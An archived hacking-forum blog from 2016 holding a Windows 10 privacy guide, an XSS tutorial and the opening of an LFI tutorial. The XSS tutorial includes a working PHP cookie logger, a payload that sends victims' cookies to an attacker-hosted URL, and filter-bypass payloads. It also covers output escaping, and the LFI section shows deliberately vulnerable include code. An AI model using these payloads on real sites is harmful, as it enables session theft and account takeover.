Wednesday, 20 April 2016

Secure Yourself On Windows 10

So I made this guide about trying to bring back privacy for Windows 10. Hope you like it.

Introduction

Some parts of this guide can be done by the many programs people have already created to automate this process; however, you could use this as a checklist as you are installing Windows 10, or if you wish to do each step manually and not have it done by a program. I would also agree that some steps in this guide are a little anal and take things too far, but I tried to go as deep as I could ;)

Yes I know the first step to privacy with Windows is never to install it and use Linux or no computer at all, but some of us need it for work related tasks or development. So here is my guide that should increase privacy on Windows 10...

 

Basic - These are the standard, basic options and settings to complete. This is for people who care a little, but not a lot, about privacy.

The first thing I would do is download and install Windows 10 Enterprise, just so you can turn off telemetry completely and have control over Windows updates. You will have to torrent this or buy it if you have the money. Once you have your Windows ISO ready for install, do the following:

Basic

  • Do not choose express settings in the installation process. Click custom and turn everything off or to your liking.
  • Use a local account and never use a Microsoft account to log in to Windows 10. The same applies if you are on Windows 8/8.1.
  • After the install is done go to PC Settings > Privacy and disable everything unless you need some settings on. I would turn all that crap off
  • While in the privacy settings page remember to turn off any Feedback...
  • Turn off update sharing: go to PC Settings > Update and Security > Advanced Options > Choose how updates are delivered, select "PCs on my local network" and then switch it off.
  • Disable Cortana.
  • Disable web search by going to the search bar and clicking settings icon and choose never to include web results.
  • Change the name of your computer by going to PC Settings > System > About; the PC name should be at the top with a button saying Rename PC. Change it to something random.
  • Install the Classic Shell start menu to replace the Windows 10 start menu, which is a horrible mess loaded with Cortana, web search and Metro apps. You can get it from: http://www.classicshell.net/

Advanced - For the more privacy concerned individuals out there.


Advanced

  • Open the command prompt as administrator and enter the following, which removes two Windows 10 data collection services and overwrites the DiagTrack autologger's .etl file:
Code
sc delete DiagTrack
sc delete dmwappushservice
echo "" > C:\ProgramData\Microsoft\Diagnosis\ETLLogs\AutoLogger\AutoLogger-Diagtrack-Listener.etl

  • Disable telemetry in Windows 10 Enterprise: Click start, search for gpedit.msc and run it as administrator, then go to Computer Configuration > Administrative Templates > Windows Components > Data Collection and Preview Builds. Double click Telemetry, hit Disabled, then apply. This method only works on Enterprise versions of Windows 10; if you have Home or Pro, please look below under the extras tab.
  • Instead of performing the following manually I recommend using a program called O&O ShutUp10 which you can find here: http://www.oo-software.com/en/shutup10
Here is an example of some of the features this program offers. I would say it is one of the best out there for disabling things like OneDrive, feedback, peer to peer updates and so on. I will also include some other programs in the extras tab below which are open source and may be useful to others.
(Screenshot: O&O ShutUp10 settings list)

 
  • I also recommend running a program called Anti-Beacon from Safer-Networking, the creators of Spybot. Spybot Anti-Beacon is a standalone tool designed to block and stop the various tracking (telemetry) issues present in Windows 10. Anti-Beacon is small, simple to use, and is provided free of charge. It was created to address the privacy concerns of Windows 10 users who do not wish to have information about their PC usage sent to Microsoft. Simply clicking "Immunize" on the main screen of Anti-Beacon will immediately disable any known tracking features included by Microsoft in the operating system. You can find this program here: https://www.safer-networking.org/spybot-anti-beacon/
  • Next, to make completely sure OneDrive won't bother you ever again, open gpedit.msc as admin, go to Computer Configuration > Administrative Templates > Windows Components > OneDrive, double click Prevent the usage of OneDrive for file storage, hit Enabled, then apply.
  • While still in the Group Policy Editor, go through Computer Configuration > Administrative Templates > Windows Components > Windows Defender, double click Turn Off Windows Defender, hit Enabled, then apply. Then either use no antivirus or install a third party one; really you only need an antivirus if you are a complete noob and are downloading untrusted content. Use Sandboxie or a virtual machine... Antivirus programs use CPU time and memory as well. I am using Common Sense 2015 currently.
  • To further disable Windows telemetry, open regedit as admin, go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection, select AllowTelemetry, change its value to 0, then apply.
  • I then recommend running another Windows 10 anti-spy program, which you can find here: https://github.com/Nummer/Destroy-Windows-10-Spying It lets you disable certain services, add firewall rules and uninstall those horrible Metro apps.
  • IMPORTANT: Windows 10 has a DNS feature called smart multi-homed name resolution, which gets around sending DNS requests only through your VPN tunnel. Windows 10 sends the DNS request through all available network interfaces at once; it does this to "improve" web performance, which it does, but it makes your VPN/proxy pointless, as you will then be leaking DNS requests through your normal ISP connection and not the VPN. Windows 10 then uses the fastest DNS response, which may not be your VPN's every time. Please look in the extras tab for more information about this.

Fix for The Above Problem
Windows 10 Enterprise/Server only: To fix the Windows 10 DNS problem, open gpedit.msc and disable smart multi-homed name resolution under Administrative Templates → Network → DNS Client → Turn off smart multi-homed name resolution.

Windows 10 Home users: The only solution at the moment is to set predefined DNS servers on your network interface under Control Panel -> Network and Sharing Center -> Change adapter settings -> right click your internet connection -> Properties. Disable IPv6 and change the IPv4 settings to use a custom DNS server. I recommend using your VPN's DNS server IP and then an open source DNS server as the alternate one, or a DNS server you trust not to log or track you.

 
  • I would then recommend changing your hosts file to block some of the Microsoft and ad hosts they use; however, Microsoft has said that some of their host names ignore the hosts file and bypass it. That does not apply to every host name of theirs, so if you wish to add this extra layer, add these host names to your Windows hosts file: (Refer to PeerBlock in the extras tab below if you want to block Microsoft IPs at the outgoing network level.)
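Before pasting a long block list into the hosts file, it is worth checking it: the resolver silently ignores lines that are not valid hosts syntax (a hostname with a :port suffix, for example), and duplicates just bloat the file. The following is an added example, not part of the original guide; it validates and deduplicates a block list and prints the cleaned entries. The sample entries are constructed for the demonstration, not the guide's full list.

```python
import re

# Constructed sample of a hosts-file block list, including two of the
# problems a pasted list commonly has: a ":443" suffix (not valid hosts
# syntax) and a repeated hostname.
SAMPLE_HOSTS_BLOCK = """\
# constructed sample, not the guide's full list
0.0.0.0 vortex.data.microsoft.com
0.0.0.0 telemetry.microsoft.com
0.0.0.0 telemetry.appex.bing.net:443
0.0.0.0 a-0001.a-msedge.net
0.0.0.0 a-0001.a-msedge.net
0.0.0.0 www.msftncsi.com   # inline comments are allowed in hosts files
"""

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# no leading or trailing hyphen, label length 1..63. Ports, paths and
# schemes are not part of a hostname and will fail this check.
HOSTNAME_RE = re.compile(
    r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)

# A block list should only ever point names at a sinkhole address.
SINKHOLE_IPS = {"0.0.0.0", "127.0.0.1", "::1"}

REASON_MALFORMED = "expected '<ip> <hostname> [<hostname> ...]'"
REASON_BAD_IP = "target is not a sinkhole address"
REASON_INVALID_HOST = "not a valid hostname (a :port suffix or path is not hosts-file syntax)"
REASON_DUPLICATE = "duplicate hostname"


def parse_hosts(text):
    """Return (entries, problems).

    entries:  ordered list of unique (ip, hostname) pairs that are safe to
              write to the hosts file (C:\\Windows\\System32\\drivers\\etc\\hosts).
    problems: list of (line_no, original_line, reason) for rejected lines.
    """
    seen = set()
    entries = []
    problems = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()  # drop comments and whitespace
        if not line:
            continue
        parts = line.split()
        if len(parts) < 2:
            problems.append((line_no, raw, REASON_MALFORMED))
            continue
        ip, hostnames = parts[0], parts[1:]
        if ip not in SINKHOLE_IPS:
            problems.append((line_no, raw, REASON_BAD_IP))
            continue
        for host in hostnames:
            name = host.lower()  # hostnames are case-insensitive
            if not HOSTNAME_RE.match(name):
                problems.append((line_no, raw, REASON_INVALID_HOST))
                continue
            if name in seen:
                problems.append((line_no, raw, REASON_DUPLICATE))
                continue
            seen.add(name)
            entries.append((ip, name))
    return entries, problems


def render_hosts_block(entries):
    """Emit the cleaned block in hosts-file syntax, one hostname per line."""
    return "\n".join("%s %s" % (ip, host) for ip, host in entries) + "\n"


if __name__ == "__main__":
    good, bad = parse_hosts(SAMPLE_HOSTS_BLOCK)
    for line_no, line, reason in bad:
        print("line %d rejected (%s): %s" % (line_no, reason, line.strip()))
    print(render_hosts_block(good))
```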

Miscellaneous - Additional things to consider when using Windows 10.

  • Install PeerBlock (link in the extras tab below) and add the Microsoft IP block list from https://www.iblocklist.com/lists, then run this program 24/7.
  • Change your MAC address from time to time.
  • Never use Microsoft Edge or Internet Explorer. Use an open source browser such as Firefox or Chromium.
  • Use VLC instead of Windows Media Player.
  • Encrypt your storage drive(s) with VeraCrypt; however, VeraCrypt does not support GPT partitions at this time and does not have full UEFI support yet. You can get VeraCrypt from here: https://veracrypt.codeplex.com/
  • Do NOT use Windows BitLocker ever; it is closed source and who knows what backdoor they have.
  • Use a VPN or proxy. Make sure you read their terms and conditions and make sure they have a no-log policy.
  • When installing any program, check the settings and see if you agree with its privacy settings, or change them to your needs. Look for things like "send program usage information" and turn that off, for example.
  • Use Linux for any sensitive tasks and only use Windows operating systems if you need them.

Extras - Additional links, reads and articles if you wish to explore.


Disable telemetry in Windows 10 in Home and Pro
- http://winaero.com/blog/how-to-disable-telemetry-and-data-collection-in-windows-10/

Open Source Windows 10 Privacy Programs
- https://github.com/Nummer/Destroy-Windows-10-Spying
- https://github.com/10se1ucgo/DisableWinTracking
- https://github.com/W4RH4WK/Debloat-Windows-10

Windows 10 VPN Users at Big Risk of DNS Leaks
- https://www.bestvpn.com/blog/28318/warning-windows-10-vpn-users-at-big-risk-of-dns-leaks-2/
- http://www.qwealthreport.com/windows-10-users-beware-of-this-new-security-risk/

Peer Block
- http://www.peerblock.com/

Extra Reads and Information
- http://thenextweb.com/microsoft/2015/07/29/wind-nos/#gref
- http://www.theguardian.com/technology/askjack/2015/aug/15/windows-10-microsoft-should-privacy-problems-worry-me
- http://www.digitaltrends.com/computing/windows-10-privacy/
- http://lifehacker.com/what-windows-10s-privacy-nightmare-settings-actually-1722267229
- https://www.youtube.com/watch?v=r8_kXzTjU0k
- https://www.youtube.com/watch?v=goy0jBquW10
- https://fix10.isleaked.com/
- http://thehackernews.com/2015/08/secure-install-windows-10.html

Some Goodies
- https://i.imgflip.com/ou470.jpg
- https://i.imgflip.com/ou4lq.jpg
- https://i.imgflip.com/owi6h.jpg
- http://i1-news.softpedia-static.com/images/news2/this-windows-10-joke-just-won-the-internet-491641-3.jpg
- http://memecrunch.com/meme/8U4EU/windows-10-is-free-right/image.gif?w=400&c=1

 

Conclusion


Thank you for reading. Please respect people who favor their privacy, if you don't agree I ask you to please leave and don't flame at people with standards towards their own privacy online.

I do hope that Linux kicks off more in the future and more support for better programs and games are produced with open source software in mind, as really that is the only way we can know for sure if we are safe.

I may add to this list and update it every now and then or if there is anything you can think of to add please feel free to post in this thread with suggestions. Sorry for any grammar or spelling, I did not have time to proof read all of this, please let me know if anything is wrong. Furthermore if you need help with any of the above feel free to ask away. I am happy to help. 


SPECIAL THANKS TO:
Thank you Kathedu for explaining some stuff to me.

BYE!

Monday, 18 April 2016

XSS Tutorial

Introduction
This handbook was originally written by Taku.

What is XSS?
XSS, also known as cross-site scripting is a web vulnerability. It's caused when the user input
is not sanitized correctly, and is therefore executed.

Let's say there's a search box on a website. If you search for the word "cat" and press enter you'll
probably come to a second page where it says something like "500 results for the word 'cat'".
This means that the website's HTML looks something like this.

Quote
<h1>500 results for the word 'cat'.</h1>
Now, let's say this website is vulnerable to XSS and you change your input from cat to HTML code; it's
not sanitized correctly and is executed. Let's say you search for this instead: <script>alert('XSS')</script>.

Now the HTML code would look like this instead.

Quote
<h1>500 results for the word '<script>alert('XSS')</script>'</h1>
The website treats the user input as if it were part of its own page, so it executes the JavaScript, resulting in a
popup saying "XSS".

There have been a number of interesting uses of XSS over the years. One of the most recognized
was by a guy called Samy Kamkar. He successfully executed JavaScript on his MySpace profile.
What he did was create a JavaScript worm: as soon as anyone visited Samy's MySpace profile, the
JavaScript payload would run, adding the payload to their own profile and changing their bio to "But most of all, Samy is my hero".

In fact, I read just a while ago on the forum that the chatbox on Alphas.sx was vulnerable to XSS.
Luckily for us, the attacker was a skid. He didn't put a dangerous payload on it. He could have done a lot worse than he actually did,
like stealing users' cookies or, just like Samy did, changing their profiles.

XSS can be very harmful if it's used correctly.

Different attack methods
In XSS there's a number of different attack methods. I'll go over some of the most common ones with you.

- Non-Persistent XSS
This is the most common one of all XSS attack methods.
These are the vulnerabilities where the payload is not stored on the website, but is passed in, for example, a URL.
This includes website searches, and it is usually found in forms whose input is never stored, the same thing I explained before.

For someone to exploit the vulnerability against another user, he'd have to craft a link and send it to the target.
Let's imagine the search XSS I talked about earlier. The URL might look something like this:

Quote
http://www.website.com/search.php?q=search+here
The search+here would be replaced with the XSS payload.

- Persistent XSS
This one is actually the rarest type of XSS. This is found in comments, bios, chat logs, etc., the places where the text is stored on the website unless it's removed
by someone like an administrator.
The XSS found on the forum was persistent: as soon as anyone visited the chatbox, the payload would be executed.

- DOM-Based XSS
This attack method is basically useless. There's no way you can attack a user this way unless you trick them into entering your JavaScript payload
in the vulnerable form/URL.
This vulnerability is similar to Non-Persistent XSS, but there's no URL to craft, so there's no way for you to make the victim
run the payload. DOM-based XSS results in you just modifying the DOM environment in the victim's browser.

Cookie Catching
Cookies are small pieces of data stored on a user's computer. They are usually plain strings and are sent along by the user's browser.
This allows the server of a website to deliver a page tailored to a particular user.
For example, if you log into Facebook with the "Remember me" box checked, a unique cookie is stored on your computer.
The next time you visit Facebook, it looks for the cookie, and if you have it, it automatically logs you in.
If you can steal these cookies with, let's say, an XSS vulnerability in Facebook, you can use those cookies in your own session to authenticate as someone else. (Which the skid in the chatbox could have done, but didn't.)

To start stealing cookies you have to set up your own website with a PHP script.
I prefer using http://3owl.com or http://000webhost.com/. Once you've created an account you can log in and go to your file manager.
Here you're going to create a file; name it whatever you want. I'll go with cookie.php.

The file is going to contain this PHP code:
Quote
<?php
// Read the cookie string passed in the "c" query parameter
// ($HTTP_GET_VARS is long gone; $_GET is the current superglobal)
$cookie = $_GET['c'];
$file = fopen('cookielog.txt', 'w');
fwrite($file, $cookie . "\n\n");
fclose($file);
// Redirect the visitor to Google
echo "<script>location.href='http://www.google.com';</script>";
?>
Once you've created it you'll have your URL with the PHP script on. It'll look something like this:
Quote
http://www.website.3owl.com/cookie.php
Now, go to the vulnerable website and enter this XSS payload:

Quote
<script>document.location="http://www.website.3owl.com/cookie.php?c=" + document.cookie;</script>
This redirects the page to your cookie logging script with the cookie appended after "c=", and the script stores the string in a text file called cookielog.txt.
You can later go to your file manager and see if you've got any cookies.

To use someone's cookie you can use any cookie editor, like Advanced Cookie Manager, which you can install as an addon in your browser.

Bypass Techniques
Most admins put up different filters to try to prevent XSS. Some of these methods are:

- magic_quotes_gpc=ON
- HEX encoding
- Obfuscation

magic_quotes_gpc=ON bypass
This is a very well known filter, and it is also used to prevent SQLi and other vulnerabilities.
What it does is escape every single quote (') and double quote (") with a backslash.

The way you bypass this is by using the JavaScript function String.fromCharCode(), so the payload contains no quotes at all.

Just convert your payload into decimal character codes using a tool like this: http://www.asciizeichen.de/tabelle.html

HEX encoding bypass
This kind of explains itself: you simply URL-encode your XSS payload as hex escapes.
For example, the XSS payload:
<script>alert(1)</script> would look like this %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e

You can use websites like http://www.swingnote.com/tools/texttohex.php for this.

Obfuscation
This is the worst filter against XSS if it's not used correctly, and there's an extremely easy way of bypassing it.
What this filter does is keep words like "script" and "alert" on a blacklist, so whenever someone tries to write them they're censored.
If the administrator is stupid you can easily bypass this by writing the payload like this:

Quote
<sCrIpT>aLerT(1)</sCriPt>
EXTRA METHOD
Sometimes you have to be a bit creative with your payloads and have a look at the source code.
You might have to write your payloads like this:

Quote
"><script>alert(1);</script>
or

Quote
</p><script>alert(1);</script>
There are endless possibilities with this method.

How to fix XSS vulnerabilities
Obviously, because we're in the "Security" section, we have to learn how to secure your website against XSS threats.
There are a number of ways to fix XSS vulnerabilities, but I'm going to name the most common one.

Let's imagine that there's a search box on your website that's vulnerable to XSS.
You go into the PHP code of the search box and have a closer look.

If it's storing the user input in a variable like 'search', you have to pass it through an escaping function so it is sanitized before output.
Let's imagine the result page's PHP code is:

Quote
<?php
echo ($_GET['search']);
?>
Instead of echoing the user input directly, we have to sanitize it first.
We can do this by changing the PHP code to

Quote
<?php
// ENT_QUOTES also escapes single quotes, so the input is inert inside
// single-quoted attributes as well; UTF-8 is the charset the page serves.
echo htmlspecialchars($_GET['search'], ENT_QUOTES, 'UTF-8');
?>
When you search for something it's going to show the same way, but the user input is now sanitized and not taken literally as HTML.
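As an added illustration of the "Bypass Techniques" and "How to fix XSS vulnerabilities" sections (example code, not part of Taku's handbook): a Python stand-in for the PHP search page that runs the tutorial's own plain, mixed-case and hex-encoded payloads through a keyword blacklist and through output encoding. The blacklist is assumed to inspect the raw query string before the web server URL-decodes it, which is the situation in which the hex trick works; html.escape with quote=True plays the role of htmlspecialchars with ENT_QUOTES.

```python
import html
from urllib.parse import unquote

# Words the "obfuscation" blacklist censors, as the tutorial describes it.
BLACKLIST = ("script", "alert")


def naive_blacklist_filter(raw_query: str) -> str:
    """The weak filter: strip blacklisted words, case-sensitively, from the
    raw query string (i.e. before the web server URL-decodes it)."""
    out = raw_query
    for word in BLACKLIST:
        out = out.replace(word, "")
    return out


def encode_for_html(text: str) -> str:
    """Output encoding, the tutorial's real fix: the Python equivalent of
    htmlspecialchars($s, ENT_QUOTES, 'UTF-8'). The characters & < > " and '
    become entities, so the browser can never parse them as markup."""
    return html.escape(text, quote=True)


def render_search_page(query: str) -> str:
    """Server-side template from the tutorial: the query lands inside <h1>."""
    return "<h1>500 results for the word '%s'.</h1>" % query


def contains_active_script(page_html: str) -> bool:
    """Crude browser stand-in: tag names are matched case-insensitively, so a
    <script> tag in any letter case would be executed."""
    return "<script" in page_html.lower()


def evaluate(raw_query: str) -> dict:
    """Run one raw q= value through both defences and report whether each
    leaves executable script in the rendered page.
    Pipeline A: blacklist the raw string, URL-decode (as $_GET does), echo.
    Pipeline B: URL-decode, then encode at the point of output."""
    blacklist_page = render_search_page(unquote(naive_blacklist_filter(raw_query)))
    encoded_page = render_search_page(encode_for_html(unquote(raw_query)))
    return {
        "blacklist_blocks": not contains_active_script(blacklist_page),
        "encoding_blocks": not contains_active_script(encoded_page),
    }


# Payloads quoted from the tutorial, as they would appear in the q= parameter.
PAYLOADS = {
    "plain": "<script>alert('XSS')</script>",
    "mixed case": "<sCrIpT>aLerT(1)</sCriPt>",
    "url hex": "%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e",
}

if __name__ == "__main__":
    for name, payload in PAYLOADS.items():
        print("%-11s %s" % (name, evaluate(payload)))
```

Only the plain payload is stopped by the blacklist; the mixed-case and hex-encoded forms sail through it, while output encoding renders all three inert.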

XSS defense as a user
A good defense against XSS as a user is using addons like NoScript. What this addon does is block
JavaScript from running on a website unless you allow it. So if someone sends you a link with a JavaScript payload on it,
it won't execute unless you allow it and the site is trusted.

Last words
Taku has written this handbook with many efforts. Show him some love :)

Bye!

Local File Inclusion (LFI) Tut

Local File Inclusion (LFI)


In this tutorial

1.0 What is LFI?
1.1 Understanding LFI
1.2 Finding LFI vulnerabilities
1.3 Exploiting LFI vulnerabilities
    - Normal method
    - Log poisoning
    - The /proc/self/environ method
    - PHP filter method(s)
1.4 Securing LFI vulnerabilities


1.0 What is LFI?

Okay, lets go.

LFI stands for Local File Inclusion. LFI is a type of web application security vulnerability, and only one of many. Web applications are applications (in other words: pages/websites) you can view and interact with in your web browser.

In this tutorial I am going to show you LFI on PHP pages. PHP is a web scripting engine. It's the most widely used one, it's the best one and it's the one you are most likely to encounter in real life scenarios. Now, you might think:
But if I only learn this on one type of script, don't I have to learn all of this for all other types of scripts?(ASP, ASP.NET, Java, Perl, CGI, [...])

No, you don't. The concept remains the same. However, to truly understand LFI in various script types, I encourage you and recommend you from the bottom of my heart to learn the languages. You don't have to learn them all, but perhaps the top 3 most used or something like that. At least PHP.

Learn more about PHP: http://php.net | http://en.wikipedia.org/wiki/PHP
To learn PHP, start here and use the links in this topic: http://archive.evilzone.org/smf/web-oriented-programming/starting-php-scripting-setting-up-a-php-environment/


To understand how LFI vulnerabilities can occur we need to see the use of the include() and other include-ish functions in PHP. But even before that, we need to see how a web page is built up in general (HTML).
A normal website consists of HTML. The HTML consists of a HEAD section and a BODY section. We could go on with this forever and say that the HEAD and BODY consist of [...]. But we won't. We will just accept the fact that websites are built up of lots of parts. Let's take a closer look at website build-up.

(Image: a rather normal looking website layout)
The image above is one of the most common website layouts ever. Let's break down its HTML layout:
Code
<html>
     <head>
          <title>A Common Website Layout</title>
     </head>
     <body>

          <div align="center" class="logo-area"></div>

          <div align="center" class="navigation-area">
                    <a href="index.php?page=home">Home</a> |
                    <a href="index.php?page=page1">Page1</a> |
                    <a href="index.php?page=page2">Page2</a>
          </div>

          <div align="center" class="main-content-area">
                     Content Content Content
          </div>

          <div align="center" class="navigation-or-copyright-area">
                    Copyright <a href="http://www.Evilzone.org">www.Evilzone.org</a> 2011
          </div>

     </body>
</html>

This is one of an endless number of ways you could build this website layout with HTML. You can see that we have an HTML section (that contains everything else). We have a HEAD section and a BODY section, and inside those are various other sections and parts. Now, I'll be honest with you: this web page does not do a whole lot as it is right now. Actually, it does nothing. It will have a logo, a navigation, a main content area and a copyright at the bottom. The navigation will have three links (Home, Page1 and Page2), but none of the links will do anything other than send you to the same page over and over again, without changing the content. This type of page is referred to as a static HTML page. But that's rather boring, wouldn't you agree? Sure you do.

This is where the magic of web application scripts comes in. As previously said, I will be showing you guys LFI with PHP. To run a website with PHP pages, you will need PHP, obviously, and a web server that supports PHP. The most common combination is PHP with the Apache web server. If you want to do testing on your own computer or set up a server, you can have a look at this topic: http://archive.evilzone.org/smf/web-oriented-programming/starting-php-scripting-setting-up-a-php-environment/

Okay, we now have ourselves a web server that can run PHP pages (hypothetically). Let's rewrite the page above to make use of the GET arguments I placed in the navigation links. Now: WHAT THE FUCK ARE GET ARGUMENTS!?!? Relax, we will get to that. Continue reading.

Before we go on, I want to get something off my chest, because I know a lot of you guys will fuck up here. In the above example (the HTML code part) we are only looking at the HTML of the page. The HTML of any page can be viewed by right clicking the page in your browser and then going to 'view source' or something similar. This is not true for viewing PHP code in web pages. The only way to view the PHP code of a page is if you can read the file itself, not from your browser. What you see in your browser is not the same as what's inside your .php file. Continuing...

Let's look at what a typical PHP URL looks like: http://archive.evilzone.org/smf/index.php There, that's a typical PHP link. Now, very often there will be something like this after the .php bit in the URL: ".php?something=something&somethingelse=somethingelse". These are GET arguments. This particular example has two GET arguments. I am sure you have figured it out by now; nonetheless: argument nr. 1 has the name "something" and its value is also "something". Argument nr. 2 has the name "somethingelse" and, yes, you guessed it, its value is also "somethingelse". Just to make things clear, the name and value do not have to be the same; these are just examples.

Additionally there are things called POST arguments and HTTP headers. However, I will not be covering those in this tutorial, nor will I show you how to use them to exploit LFI vulnerabilities. Don't worry about it; as you learn more you will understand these too. It's not as hard as it sounds. I might even write tutorials for POST arguments and such later.

Now we can finally rewrite the page above with PHP code in it, to produce different content for each of the links (Home, Page1 and Page2).
Code
<html>
     <head>
          <title>A Common Website Layout</title>
     </head>
     <body>

          <div align="center" class="logo-area"></div>

          <div align="center" class="navigation-area">
                    <a href="index.php?page=home">Home</a> |
                    <a href="index.php?page=page1">Page1</a> |
                    <a href="index.php?page=page2">Page2</a>
          </div>

          <div align="center" class="main-content-area">
<?php
// This is a PHP comment.
// PHP comments do not affect the PHP script,
// nor are PHP comments shown in the HTML code in the end. Actually, nothing in between "<?php" and "?>" will be shown in the HTML source.

// Let's first see if the GET argument we want to use is present
if (isset($_GET['page']))
{
     // The GET argument with name "page" is present. Let's look at its value:
     if ($_GET['page'] == "home")
     {
          // The GET argument's value is "home". Let's write out "home" to the HTML source
          echo("home");
     }
     elseif ($_GET['page'] == "page1")
     {
          // The GET argument's value is "page1". Let's write out "page1" to the HTML source
          echo("page1");
     }
     elseif ($_GET['page'] == "page2")
     {
          // The GET argument's value is "page2". Let's write out "page2" to the HTML source
          echo("page2");
     }
     else
     {
          // The GET argument's value is none of what we want, let's just give them the home page
          echo("home");
     }
}
else
{
     // The GET argument is not present in the URL. That means they are at the home page. Let's give them the home page.
     echo("home");
}
?>
          </div>

          <div align="center" class="navigation-or-copyright-area">
                    Copyright <a href="http://www.Evilzone.org">www.Evilzone.org</a> 2011
          </div>

     </body>
</html>

Gosh, that was a lot of code. Well, not really. But I can imagine it seems like tons for people who are not familiar with it. Let's break it down.
The first thing the PHP code will do is see whether or not the GET argument with the name "page" is present in the URL. If it is, it will look further at the argument's value. If the value is "home", it will write out "home" to the HTML source. If the argument's value is "page1" it will write out "page1" to the HTML source. And so on. However, if the argument is not present in the URL, we should still give the person browsing our page something. It just means they are at index.php without anything after .php. So the script will just give them the same thing as if they were browsing the "home" page. If you still do not understand the code above, just read through it a few times. It's all logic really; it's even using logical words like isset(), if, else, elseif etc.

Some of you might wonder where I am getting the values home, page1 and page2 from. If you look closely at the HTML source of our page you will see this:
Code
          <div align="center" class="navigation-area">
                    <a href="index.php?page=home">Home</a> |
                    <a href="index.php?page=page1">Page1</a> |
                    <a href="index.php?page=page2">Page2</a>
          </div>

These are our main navigation links. Home goes to http://oursite.com/index.php?page=home, Page1 goes to http://oursite.com/index.php?page=page1 and so on. This is where we are getting our values from ("home", "page1", "page2").

Okay. This is all good, right? We have a script which serves three different contents depending on the link you click on the page. This is all good. But the content is somewhat limited and boring. We could simply change the echo(""); lines to something much, much larger: full-blown pages. However, that would be highly impractical if you have 100 different links/pages on your site. If your average page is 250 characters, that would be at least 25000 characters in index.php. This is where the include() and other include-ish functions in PHP come in.

Until now we have only talked about this page as a single file. Let's go into more detail. Make a new file called index.php in your web server's root web folder (or any other place on your computer or server that you want it and your web server can reach it, depending on your web server settings). On Windows it is going to look something like C:\apache\public_html\. On Linux it will be something like /var/www/public_html/. Additionally create a new folder in the same folder as index.php called "pages". Inside the folder "pages" create four new files called "index.php", "home.php", "page1.php" and "page2.php". File tree:
Quote
Your-Apache-Web-Folder
|-- pages
|   |-- index.php
|   |-- home.php
|   |-- page1.php
|   |-- page2.php
|
|-- index.php

PS. (The index.php inside the pages folder is just so people can't list the files in the folder. Don't mind it, just let it be there, empty.)

What we are going to do now is this: instead of just using the echo() function in the PHP script to echo static values for each of the pages, we are going to use the include() function. It's really simple. Put this in your index.php:
Code
<html>
     <head>
          <title>A Common Website Layout</title>
     </head>
     <body>

          <div align="center" class="logo-area"></div>

          <div align="center" class="navigation-area">
                    <a href="index.php?page=home">Home</a> |
                    <a href="index.php?page=page1">Page1</a> |
                    <a href="index.php?page=page2">Page2</a>
          </div>

          <div align="center" class="main-content-area">
<?php
// This is a PHP comment.
// PHP comments do not affect the PHP script,
// nor are PHP comments shown in the HTML code in the end. Actually, nothing in between "<?php" and "?>" will be shown in the HTML source.

// Let's first see if the GET argument we want to use is present
if (isset($_GET['page']))
{
     // The GET argument with name "page" is present. Let's look at its value:
     if ($_GET['page'] == "home")
     {
          // The GET argument's value is "home". Let's include the home.php page into the HTML source
          include("pages/home.php");
     }
     elseif ($_GET['page'] == "page1")
     {
          // The GET argument's value is "page1". Let's include the page1.php page into the HTML source
          include("pages/page1.php");
     }
     elseif ($_GET['page'] == "page2")
     {
          // The GET argument's value is "page2". Let's include the page2.php page into the HTML source
          include("pages/page2.php");
     }
     else
     {
          // The GET argument's value is none of what we want, let's just give them the home page
          include("pages/home.php");
     }
}
else
{
     // The GET argument is not present in the URL. That means they are at the home page. Let's give them the home page.
     include("pages/home.php");
}
?>
          </div>

          <div align="center" class="navigation-or-copyright-area">
                    Copyright <a href="http://www.Evilzone.org">www.Evilzone.org</a> 2011
          </div>

     </body>
</html>

See? All we did was replace the echo with include. This will now read the contents and code of home.php, page1.php and page2.php and print that into the HTML instead, depending on the GET argument. Now we can have huge pages with long texts, images and more code inside each of the three files in the pages directory, without having a huge mess in index.php. When you want to edit your pages you simply locate the page file in the pages folder and edit that one file. Sweet, right? Absolutely! However, if you do not know what the fuck you are doing when you are using the include() function, you can get some serious security issues.



1.1 Understanding LFI

In itself, the include() function is not vulnerable to anything. It's wrong/dangerous use of it that causes the security issues. The include() function is not limited to reading local files. It can even read remote files from URLs. So you could do include("http://site.com/pages/page.txt") and it would include the contents of page.txt. But mostly the include() function will be used to include dynamic pages: include("pages/home.php"). This is what creates LFI scenarios.

Lets create a new scenario. We got the following files/pages:
index.php
1.php
2.php
3.php

index.php is the file the users are going to visit with their browser. When the user first visits index.php we are going to display 3 links.
Code
<a href="index.php?page=1">Page 1</a>
<a href="index.php?page=2">Page 2</a>
<a href="index.php?page=3">Page 3</a>

When the user clicks the first link its going to show the content of 1.php, when the user clicks the second link its going to show the contents of 2.php and when the user clicks the last link its going to show the contents of 3.php.

The index.php script would in this case look something like this (note that I am now coding like an idiot to create security holes):
Code
if (isset($_GET['page']))
{
    // The GET argument is present. Lets include the page.
    include($_GET['page'] . ".php");
}
else
{
    // The GET argument is not present. Lets give the poor guy some links!
    echo('<p><a href="index.php?page=1">Page 1</a></p>');
    echo('<p><a href="index.php?page=2">Page 2</a></p>');
    echo('<p><a href="index.php?page=3">Page 3</a></p>');
}

The content of 1.php, 2.php and 3.php is not important in this example, so I won't say anything about that.

Now, when a user clicks the Page 1 link he or she is taken to www.example.com/index.php?page=1

The PHP script in index.php will now see that the user is requesting the page called 1 and it will include the number in the URL GET argument + ".php" the same goes for 2 and 3.

So, for Page 1 it will include 1.php, for Page 2 it will include 2.php and for Page 3 it will include 3.php

So far, so good. Right? Not really. The above script is a death trap. You might not see it, but I do. And I will show you.
What if I were to go to index.php?page=4? It would then try to include 4.php. But that file obviously does not exist. So the page would return an error message like this:
Quote
Warning: include(4.php) [function.include]: failed to open stream: No such file or directory in PATH on line 3

Warning: include() [function.include]: Failed opening '4.php' for inclusion (include_path='.;PATH') in PATH\\index.php on line 3

